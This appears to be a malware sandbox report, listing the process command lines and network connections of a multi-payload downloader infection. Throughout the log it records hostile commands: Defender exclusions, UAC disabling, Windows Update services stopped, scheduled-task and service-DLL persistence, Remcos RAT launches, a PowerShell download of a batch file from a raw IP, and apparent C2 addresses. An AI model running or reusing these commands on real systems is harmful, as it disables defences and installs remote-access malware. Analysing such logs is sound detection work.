C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "QKJNEQWA"
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Users\Admin\AppData\Local\Temp\Files\A.I_1003H.exe
"C:\Users\Admin\AppData\Local\Temp\Files\A.I_1003H.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\A.I_Run.cmd" "
C:\Windows\SysWOW64\sc.exe
sc stop PcaSvc
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\Sysnative\sfc.exe
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\Sysnative\sfc.exe /t /deny everyone:f
C:\Users\Admin\AppData\Local\Temp\Files\lkyhjksefa.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lkyhjksefa.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
C:\Users\Admin\AppData\Local\Temp\Files\cclent.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cclent.exe"
C:\Users\Admin\AppData\Local\Temp\Files\scj7cm7v.exe
"C:\Users\Admin\AppData\Local\Temp\Files\scj7cm7v.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4296 -s 576
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "vchost32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "vchost32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\lega.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lega.exe"
C:\Users\Admin\AppData\Local\Temp\Files\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fcxcx.exe"
C:\Users\Admin\AppData\Local\Temp\Files\lega.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lega.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pyld611114.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pyld611114.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe'
C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 588
C:\Windows\system32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
C:\Windows\system32\cmd.exe
cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
C:\Windows\system32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\Admin\AppData\Local\Temp\Files\pyld611114.exe"
C:\Windows\System32\usvcinsta64.exe
"C:\Windows\System32\usvcinsta64.exe"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
C:\Users\Admin\AppData\Local\Temp\Files\BattleGermany.exe
"C:\Users\Admin\AppData\Local\Temp\Files\BattleGermany.exe"
C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Cassette Cassette.cmd & Cassette.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Users\Admin\AppData\Local\Temp\Files\yoyf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yoyf.exe"
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB329.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB329.tmp.bat
C:\Users\Admin\AppData\Local\Temp\Files\m.exe
"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
C:\Windows\System32\cmd.exe
cmd.exe /c mkdir "\\?\C:\Windows \System32"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\System32\cmd.exe
cmd.exe /c start "" "C:\Windows \System32\printui.exe"
C:\Windows \System32\printui.exe
"C:\Windows \System32\printui.exe"
C:\Windows\System32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Windows\system32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
C:\Users\Admin\AppData\Local\Temp\Files\neofindsetup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\neofindsetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISAB9511B1EE52494CA9BAED6A1536F012_1_0_6_1940.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\Files\neofindsetup.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 56B7032438E15C00DC54CF297DFC5677 C
C:\Windows\SysWOW64\cmd.exe
cmd /c md 177479
C:\Windows\SysWOW64\findstr.exe
findstr /V "FoolBurkeRetainedWait" Drop
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Tracked + ..\Luggage + ..\Prime + ..\Involved + ..\Fluid + ..\Newport + ..\Rod + ..\Society s
C:\Users\Admin\AppData\Local\Temp\177479\Community.pif
Community.pif s
C:\Windows\SysWOW64\choice.exe
choice /d y /t 15
C:\Users\Admin\AppData\Local\Temp\Files\laz.exe
"C:\Users\Admin\AppData\Local\Temp\Files\laz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D124.tmp\D125.tmp\D126.bat C:\Users\Admin\AppData\Local\Temp\Files\laz.exe"
C:\Users\Admin\AppData\Local\Temp\Files\fern_wifi_recon%252.34.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fern_wifi_recon%252.34.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-999616155-694315717-15613010511537143446254536897-79485766220862515061961752423"
C:\Windows\system32\cmd.exe
cmd.exe /c sc create x902135 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x902135\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x902135.dat" /f && sc start x902135
C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe
"C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"
C:\Windows\system32\sc.exe
sc create x902135 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Offensive Offensive.cmd & Offensive.cmd & exit
C:\Windows\system32\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\services\x902135\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x902135.dat" /f
C:\Windows\system32\sc.exe
sc start x902135
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k DcomLaunch
C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe
"C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe"
C:\Users\Admin\AppData\Local\Temp\Files\clip.exe
"C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Capable" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkyNav Technologies\SkyPilot.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\Windows\system32\cmd.exe
cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "745114946798365849-422009081-983814003387601792-13482919387327254632020751060"
C:\Users\Admin\AppData\Local\Temp\Files\donut.exe
"C:\Users\Admin\AppData\Local\Temp\Files\donut.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "SkyPilot" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkyNav Technologies\SkyPilot.js'" /sc onlogon /F /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Capable" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkyNav Technologies\SkyPilot.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\Windows\System32\console_zero.exe
"C:\Windows\System32\console_zero.exe"
C:\Windows\System32\cmd.exe
cmd.exe /c schtasks /delete /tn "console_zero" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /tn "console_zero" /f
C:\Windows\system32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-997839755-2064086691-2045689007-11751884714437748471772149549-14403634801730604989"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Users\Admin\AppData\Local\Temp\Files\1434orz.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1434orz.exe"
C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"
C:\Windows\System32\cmd.exe
cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12819673011008707276968725410-1003145582-166796909284784440913904987511746715133"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\p4cof96p.exe
"C:\Users\Admin\AppData\Local\Temp\Files\p4cof96p.exe"
C:\Windows\system32\cmd.exe
cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
C:\Windows\system32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\p4cof96p.exe"
C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Users\Admin\AppData\Local\Temp\Files\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Launcher.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 543648
C:\Windows\SysWOW64\findstr.exe
findstr /V "BiddingVeRoutinesFilms" Bowling
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Suzuki + ..\Major + ..\Tit + ..\Adjust + ..\Invest + ..\Severe + ..\Sony + ..\Prefers E
C:\Users\Admin\AppData\Local\Temp\543648\Legend.pif
Legend.pif E
C:\Windows\SysWOW64\choice.exe
choice /d y /t 15
C:\Users\Admin\AppData\Local\Temp\Files\xblkpfZ8Y4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\xblkpfZ8Y4.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CDC.tmp\CDD.tmp\CDE.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
C:\Users\Admin\AppData\Local\Temp\Files\123.exe
"C:\Users\Admin\AppData\Local\Temp\Files\123.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE
"C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1565.tmp\1566.tmp\1567.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "ScanGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc onlogon /F /RL HIGHEST
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4544 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
cmd.exe /c mkdir "\\?\C:\Windows \System32"
C:\Windows\system32\cmd.exe
cmd.exe /c start "" "C:\Windows \System32\printui.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-91029129813464582698872028851549608026182378714546941565243237351-1588294834"
C:\Windows \System32\printui.exe
"C:\Windows \System32\printui.exe"
C:\Windows\system32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Users\Admin\AppData\Local\Temp\Files\Security.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Security.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Security.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Security.exe"
C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe
"C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"
C:\Users\Admin\AppData\Local\Temp\Files\file.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\79556\RegAsm.exe
"C:\Users\Admin\AppData\Local\Temp\79556\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe"
C:\ProgramData\tst\remcos.exe
"C:\ProgramData\tst\remcos.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\1.bat" "
C:\Windows\system32\cmd.exe
cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
C:\Windows\System32\bav64.exe
"C:\Windows\System32\bav64.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7941635313601072631591545727-9200060411805374357780946319-878905287-1601670466"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\clamer.exe
clamer.exe -priverdD
C:\Users\Admin\AppData\Local\Temp\RarSFX2\thkdh.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\thkdh.exe"
C:\Windows\System32\timeout.exe
timeout /t 14 /nobreak
C:\Windows\system32\cmd.exe
cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"
C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"
C:\Windows\System32\timeout.exe
timeout /t 16 /nobreak
C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"
C:\Users\Admin\AppData\Local\Temp\Files\s.exe
"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
C:\Users\Admin\AppData\Local\Temp\Files\WenzCord.exe
"C:\Users\Admin\AppData\Local\Temp\Files\WenzCord.exe"
C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Update.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\WenzCord.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\Files\nano.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nano.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe" /rl HIGHEST /f
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4544 CREDAT:406538 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'G:\'
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2663839248540557-5580103221903759652-1070035231-892048859-1275182514179664319"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'H:\'
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
svchost.exe
C:\Windows\SysWOW64\rmclient.exe
rmclient.exe
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1046918440-205919904936314988-2131441806-1315632714-1658121554-1404167363-638019036"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005D0" "00000000000003D8"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 866ED099C1F427A4DDA8DC1CF7D48512
C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla2.exe
"C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla2.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DB17ACC0C747ADBF3C34A02782913676
C:\Windows\system32\csrss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 44.243.209.238:80 | 44.243.209.238 | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | rdNlUzfNpfEZxTHhrydCy.rdNlUzfNpfEZxTHhrydCy | udp |
| DE | 94.156.177.133:7000 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| RU | 185.215.113.19:80 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| AE | 62.60.244.198:15666 | tcp | |
| US | 8.8.8.8:53 | eoufaoeuhoauengi.su | udp |
